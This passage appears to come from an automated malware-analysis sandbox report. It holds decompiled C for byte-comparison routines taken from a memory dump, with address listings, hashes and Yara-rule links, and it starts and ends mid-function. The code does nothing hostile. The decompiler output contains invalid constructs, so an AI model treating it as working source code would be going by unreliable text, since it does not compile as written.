							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x004289fe
0x004289fe
0x00428a04
0x00428a84
0x00428a86
0x00428a88
0x00000000
0x00000000
0x00428a8e
0x00428a94
0x00428b13
0x00428b15
0x00428b17
0x00000000
0x00000000
0x00428b1d
0x00428b23
0x00428ba2
0x00428ba4
0x00428ba6
0x00000000
0x00000000
0x00428bac
0x00428bb2
0x00428c31
0x00428c33
0x00428c35
0x00000000
0x00000000
0x00428c41
0x00428cc1
0x00428cc3
0x00428cc5
0x00000000
0x00000000
0x00428ccb
0x00428cd1
0x00428d50
0x00428d52
0x00428d54
0x00000000
0x00000000
0x00428d5a
0x00428d60
0x00428ddf
0x00428de1
0x00428de3
0x00000000
0x00000000
0x00428df1
0x00428df3
0x004289d6
0x004289de
0x004289e0
0x004285bc
0x004285c4
0x004285c6
0x004285d7
0x004285d7
0x004281cc
0x00428f28
0x00428f28
0x004289ed
0x004289f3
0x00428e0c
0x00428e0c
0x00000000
0x004289f9
0x00000000
0x004289f9
0x004289f3
0x00428e00
0x00428e06
0x00000000
0x00000000
0x00000000
0x00428e06
0x00428d69
0x00428d6b
0x00428d82
0x00428d8a
0x00428d8c
0x00428da3
0x00428dab
0x00428dad
0x00428dc4
0x00428dcc
0x00428dce
0x00428ddb
0x00428ddb
0x00000000
0x00428dce
0x00428dba
0x00428dbe
0x00000000
0x00000000
0x00000000
0x00428dbe
0x00428d99
0x00428d9d
0x00000000
0x00000000
0x00000000
0x00428d9d
0x00428d78
0x00428d7c
0x00000000
0x00000000
0x00000000
0x00428d7c
0x00428cda
0x00428cdc
0x00428cf3
0x00428cfb
0x00428cfd
0x00428d14
0x00428d1c
0x00428d1e
0x00428d35
0x00428d3d
0x00428d3f
0x00428d4c
0x00428d4c
0x00000000
0x00428d3f
0x00428d2b
0x00428d2f
0x00000000
0x00000000
0x00000000
0x00428d2f
0x00428d0a
0x00428d0e
0x00000000
0x00000000
0x00000000
0x00428d0e
0x00428ce9
0x00428ced
0x00000000
0x00000000
0x00000000
0x00428ced
0x00428c4b
0x00428c4d
0x00428c64
0x00428c6c
0x00428c6e
0x00428c85
0x00428c8d
0x00428c8f
0x00428ca6
0x00428cae
0x00428cb0
0x00428cbd
0x00428cbd
0x00000000
0x00428cb0
0x00428c9c
0x00428ca0
0x00000000
0x00000000
0x00000000
0x00428ca0
0x00428c7b
0x00428c7f
0x00000000
0x00000000
0x00000000
0x00428c7f
0x00428c5a
0x00428c5e
0x00000000
0x00000000
0x00000000
0x00428c5e
0x00428bbb
0x00428bbd
0x00428bd4
0x00428bdc
0x00428bde
0x00428bf5
0x00428bfd
0x00428bff
0x00428c16
0x00428c1e
0x00428c20
0x00428c2d
0x00428c2d
0x00000000
0x00428c20
0x00428c0c
0x00428c10
0x00000000
0x00000000
0x00000000
0x00428c10
0x00428beb
0x00428bef
0x00000000
0x00000000
0x00000000
0x00428bef
0x00428bca
0x00428bce
0x00000000
0x00000000
0x00000000
0x00428bce
0x00428b2c
0x00428b2e
0x00428b45
0x00428b4d
0x00428b4f
0x00428b66
0x00428b6e
0x00428b70
0x00428b87
0x00428b8f
0x00428b91
0x00428b9e
0x00428b9e
0x00000000
0x00428b91
0x00428b7d
0x00428b81
0x00000000
0x00000000
0x00000000
0x00428b81
0x00428b5c
0x00428b60
0x00000000
0x00000000
0x00000000
0x00428b60
0x00428b3b
0x00428b3f
0x00000000
0x00000000
0x00000000
0x00428b3f
0x00428a9d
0x00428a9f
0x00428ab6
0x00428abe
0x00428ac0
0x00428ad7
0x00428adf
0x00428ae1
0x00428af8
0x00428b00
0x00428b02
0x00428b0f
0x00428b0f
0x00000000
0x00428b02
0x00428aee
0x00428af2
0x00000000
0x00000000
0x00000000
0x00428af2
0x00428acd
0x00428ad1
0x00000000
0x00000000
0x00000000
0x00428ad1
0x00428aac
0x00428ab0
0x00000000
0x00000000
0x00000000
0x00428a06
0x00428a06
0x00428a0a
0x00428a0e
0x00428a10
0x00428a27
0x00428a27
0x00428a2b
0x00428a2f
0x00428a31
0x00428a48
0x00428a48
0x00428a4c
0x00428a50
0x00428a52
0x00428a69
0x00428a69
0x00428a6d
0x00428a71
0x00428a73
0x00428a79
0x00428a7c
0x00428a80
0x00428a80
0x00000000
0x00428a73
0x00428a58
0x00428a5b
0x00428a5f
0x00428a63
0x00000000
0x00000000
0x00000000
0x00428a63
0x00428a37
0x00428a3a
0x00428a3e
0x00428a42
0x00000000
0x00000000
0x00000000
0x00428a42
0x00428a16
0x00428a19
0x00428a1d
0x00428a21
0x00000000
0x00000000
0x00000000
0x00428a21
0x00427df7
0x00427df7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 751e550ec95f037a4186917dcb7567c63e6d9a9395ab3fb85734917b215024e5
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 32D18B73E1F9F30A8775812E606863FEE626FD165039EC3A6DCD03F3898A2A5C0595D4

Uniqueness

Uniqueness Score: -1.00%

Function 004285DE, Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004285DE(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x004285de
0x004285de
0x004285e4
0x00428663
0x00428665
0x00428667
0x00000000
0x00000000
0x0042866d
0x00428673
0x004286f2
0x004286f4
0x004286f6
0x00000000
0x00000000
0x004286fc
0x00428702
0x00428781
0x00428783
0x00428785
0x00000000
0x00000000
0x0042878b
0x00428791
0x00428810
0x00428812
0x00428814
0x00000000
0x00000000
0x0042881a
0x00428820
0x0042889f
0x004288a1
0x004288a3
0x00000000
0x00000000
0x004288af
0x0042892f
0x00428931
0x00428933
0x00000000
0x00000000
0x00428939
0x0042893f
0x004289be
0x004289c0
0x004289c2
0x00000000
0x00000000
0x004289d0
0x004281ca
0x004281cc
0x00428f28
0x00428f28
0x004289de
0x004289e0
0x004285bc
0x004285c4
0x004285c6
0x004285d7
0x004285d7
0x00000000
0x004285c6
0x004289ed
0x004289f3
0x00428e0c
0x00000000
0x00428e0c
0x00000000
0x004289f9
0x00428948
0x0042894a
0x00428961
0x00428969
0x0042896b
0x00428982
0x0042898a
0x0042898c
0x004289a3
0x004289ab
0x004289ad
0x004289ba
0x004289ba
0x00000000
0x004289ad
0x00428999
0x0042899d
0x00000000
0x00000000
0x00000000
0x0042899d
0x00428978
0x0042897c
0x00000000
0x00000000
0x00000000
0x0042897c
0x00428957
0x0042895b
0x00000000
0x00000000
0x00000000
0x0042895b
0x004288b9
0x004288bb
0x004288d2
0x004288da
0x004288dc
0x004288f3
0x004288fb
0x004288fd
0x00428914
0x0042891c
0x0042891e
0x0042892b
0x0042892b
0x00000000
0x0042891e
0x0042890a
0x0042890e
0x00000000
0x00000000
0x00000000
0x0042890e
0x004288e9
0x004288ed
0x00000000
0x00000000
0x00000000
0x004288ed
0x004288c8
0x004288cc
0x00000000
0x00000000
0x00000000
0x004288cc
0x00428829
0x0042882b
0x00428842
0x0042884a
0x0042884c
0x00428863
0x0042886b
0x0042886d
0x00428884
0x0042888c
0x0042888e
0x0042889b
0x0042889b
0x00000000
0x0042888e
0x0042887a
0x0042887e
0x00000000
0x00000000
0x00000000
0x0042887e
0x00428859
0x0042885d
0x00000000
0x00000000
0x00000000
0x0042885d
0x00428838
0x0042883c
0x00000000
0x00000000
0x00000000
0x0042883c
0x0042879a
0x0042879c
0x004287b3
0x004287bb
0x004287bd
0x004287d4
0x004287dc
0x004287de
0x004287f5
0x004287fd
0x004287ff
0x0042880c
0x0042880c
0x00000000
0x004287ff
0x004287eb
0x004287ef
0x00000000
0x00000000
0x00000000
0x004287ef
0x004287ca
0x004287ce
0x00000000
0x00000000
0x00000000
0x004287ce
0x004287a9
0x004287ad
0x00000000
0x00000000
0x00000000
0x004287ad
0x0042870b
0x0042870d
0x00428724
0x0042872c
0x0042872e
0x00428745
0x0042874d
0x0042874f
0x00428766
0x0042876e
0x00428770
0x0042877d
0x0042877d
0x00000000
0x00428770
0x0042875c
0x00428760
0x00000000
0x00000000
0x00000000
0x00428760
0x0042873b
0x0042873f
0x00000000
0x00000000
0x00000000
0x0042873f
0x0042871a
0x0042871e
0x00000000
0x00000000
0x00000000
0x0042871e
0x0042867c
0x0042867e
0x00428695
0x0042869d
0x0042869f
0x004286b6
0x004286be
0x004286c0
0x004286d7
0x004286df
0x004286e1
0x004286ee
0x004286ee
0x00000000
0x004286e1
0x004286cd
0x004286d1
0x00000000
0x00000000
0x00000000
0x004286d1
0x004286ac
0x004286b0
0x00000000
0x00000000
0x00000000
0x004286b0
0x0042868b
0x0042868f
0x00000000
0x00000000
0x00000000
0x004285e6
0x004285e6
0x004285e9
0x004285ed
0x004285ef
0x00428606
0x00428606
0x0042860a
0x0042860e
0x00428610
0x00428627
0x00428627
0x0042862b
0x0042862f
0x00428631
0x00428648
0x00428648
0x0042864c
0x00428650
0x00428652
0x00428658
0x0042865b
0x0042865f
0x0042865f
0x00000000
0x00428652
0x00428637
0x0042863a
0x0042863e
0x00428642
0x00000000
0x00000000
0x00000000
0x00428642
0x00428616
0x00428619
0x0042861d
0x00428621
0x00000000
0x00000000
0x00000000
0x00428621
0x004285f5
0x004285f8
0x004285fc
0x00428600
0x00000000
0x00000000
0x00000000
0x00428600
0x00427df7
0x00427df7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: b1abaeccd5e2734c44579115570e067770d5afef4ed881c2751e943b17f47662
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 4ED18D73E1F9F30A8735812D646863FEA626FD165439EC3A6CCD02F389DA6A5C0096D4

Uniqueness

Uniqueness Score: -1.00%

Function 004281D2, Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004281D2(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
